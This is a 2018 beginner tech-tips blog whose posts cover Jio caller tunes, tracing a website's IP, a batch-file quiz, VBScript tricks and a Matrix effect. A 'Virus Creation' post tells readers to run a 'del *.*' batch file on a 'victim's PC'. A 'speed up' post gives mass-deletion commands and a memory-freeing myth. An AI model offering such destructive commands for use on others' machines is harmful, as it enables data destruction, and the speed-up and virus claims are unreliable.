Sunday, November 4, 2018

How to enable a Jio Caller tune which is not available.

Hello friends
Most of us like to set a Caller tune.
But many of us face problems like the Caller tune isn't  available for Jio.
So in this post I am going to tell how to enable a Caller tune which isn't available.
Just remember the first Three words of the song name; if the song name is of only of one word, remember only one word. (Remember to type all letters in CAPITAL.)
Step 1: Open messages and Give a message to 56789 the tree words of the song.
Maybe you would get a notification that your message isn't reached.
But wait!! You would shortly get a reply of the suggestions with numbers 1, 2, 3, 4, 5, 6, etc.
Step 2: Select the song number which you like and message the song number that you like.
Step 3: You would be asked to Message 1 to enable it for all callers.
Step 4: You would receive a message to Message Y to a number 51893XXXX.
Step 5: You would receive a message from 51893XXXX.
Step 6: Just message Y to the number.
Step 7: There you go you would get a conformation message from Jio that your Caller tune has been set.

If you like the post please comment.
THANK YOU..................

Sunday, October 21, 2018

How to trace a website ip to location.

Hello friends
Today I will tell you how to trace a website's server address.
First of all open cmd as administrator.
type tracert www.youtube.com and press enter.
you would see a picture like this-





















Copy the last IP that is 2607:f8b0:4007:809::200e and save it in clipboard.
Open your web browser and type in it's address bar www.ipinfo.io/2607:f8b0:4007:809::200e and press enter.
You will see the youtube server's location, like in the image below-
And there you go.......
By this you can ind various other website's server address.
Thank you
And please comment.





















Sunday, October 7, 2018

A simple Quiz

Hello everyone welcome back!!
Today I gonna show you how to make a simple quiz in notepad or notepad++

Just type or copy the following code in notepad or notepad++


@echo off
title Quiz
echo Quiz time
pause
echo Q1) What is Indian National flag made up of?
echo a) Cotton          b) Wool
echo c) Khadi           d) Polyester
pause
echo If you thought about Khadi you are absolutely correct.
pause
cls
echo Q2) What language do computer understand?
echo a) English         b) Binary
echo c) French          c) Hindi
pause
echo If you thought about Binary you are absolutely correct.
pause
cls
echo Q3) Which snake is the fastest snake on Earth?
echo a) Viper           b) King Cobra
echo c) Black mamba     d) Rattle snake
pause
echo If you thought about Black mamba then you are absolutely correct.
pause
cls
echo Q4) What is the largest storage unit in computer?
echo a) Megabytes(mb)   b) Terabytes(tb)
echo c) Kilobytes(kb)   d) Petabyte(pb)
pause
echo If you thought about Petabyte then you are absolutely correct.
pause
cls
echo Q5) Which is the largest skyscrapper in the world?
echo a) Petronas Twin tower  b) Qutub Minar
echo c) Burj Khalifa    d) Prince tower
pause
echo If you thought about Burj Khalifa then you are absolutely correct.
pause
echo Thank You and please play again.
pause
exit


if you want to add more questions please add it as follows:

cls
echo Q#) ---------------------Your Question----------------------?
echo a)option 1                  b)option 2
echo c)option 3                  d)option 4
pause If you thought about option then you are absolutely correct.

Replace # with ouestion number (1,2,3,4,5,6,etc.).


If you like my post then please leave a comment.
And I would request you all to make any suggestions in the comment section.
Thank You.

Thursday, March 15, 2018

Fast up your computer

If your computer is too slow, there are two tricks
First-
1-Open Notepad
2-type ‘FREEMEM=SPACE(64000000) ‘
3-Save it as ram.vbs

Second
1-Open Notepad
2-type 
del /q /s  "c:\winnt\temp\*.*"
del /q /s  "c:\windows\temp\*.*"
del /q /s  "C:\WINDOWS\Prefetch\*.*"
del /q /s  "%USERPROFILE%\Local Settings\Temp\*.*"
del /q /s  "%USERPROFILE%\Local Settings\Temporary Internet Files\*.*"
del /q /s  "%USERPROFILE%\Cookies\*.*"
Rmdir /q /s  "%USERPROFILE%\Local Settings\Temporary Internet Files"
Rmdir /q /s  "%USERPROFILE%\Local Settings\Temp"
Rmdir /q /s  "%USERPROFILE%\Cookies\*.*"
Rmdir /q /s  "c:\winnt\Temp"
Rmdir /q /s  "c:\windows\Temp"
md  "%USERPROFILE%\Local Settings\Temporary Internet Files"
md  "%USERPROFILE%\Local Settings\Temp"
md  "%USERPROFILE%\Cookies"
3-Save it as cache.bat
4-Run it

Feedback

Felling so bored and want a magic that would make your computer to talk with you?
Here are few steps
1-Open Notepad
2-Type ‘dim fname
Fname=Inputbox(“Hi, What’s your name?”)
Fname=Inputbox (“How are you?”)
Fname=Inputbox(“What’s your favourite sport”)
Fname=Inputbox(“What’s your favourite Hobby?”)
Fname=Inputbox(“Will you be my friend?”)
X=MsgBox(“Thank You”,4+64,”Info”)

Sunday, February 25, 2018

Computer Talk

let Computer speak what you tell
1-Open notepad
2-type strText=Inputbox("What should Sam say?","Sam")
Set objVoice=CreateObject("SAPI.SpVoice")
ObjVoice.speak strText
3-save it as voice.vbs
4-Run
The image would seem like this



Sunday, January 28, 2018

Matrix effect

Matrix in a computer(Not harmful)
1-Open notepad and paste the following code
2-type'color 02
:tricks
echo
%random%%random%%random%%random%
%random%%random%%random%%random%
goto tricks
3-Save it as Matrix.bat
4-Open and enjoy
You would see a image like this

Virus Creation

Anybody wants to know how a virus is created?
Here are some steps
1-Open Notepad
2-type'del*.*
3-Save as cad.bat
4-Run it on victim's PC
5-Result
Whole Computer's gone

How To Overclock Your CPU without going into BIOS Settings

 Hello everyone, Let's get straight to the topic.  Most of the people who want to overclock their CPU are asked to follow the most commo...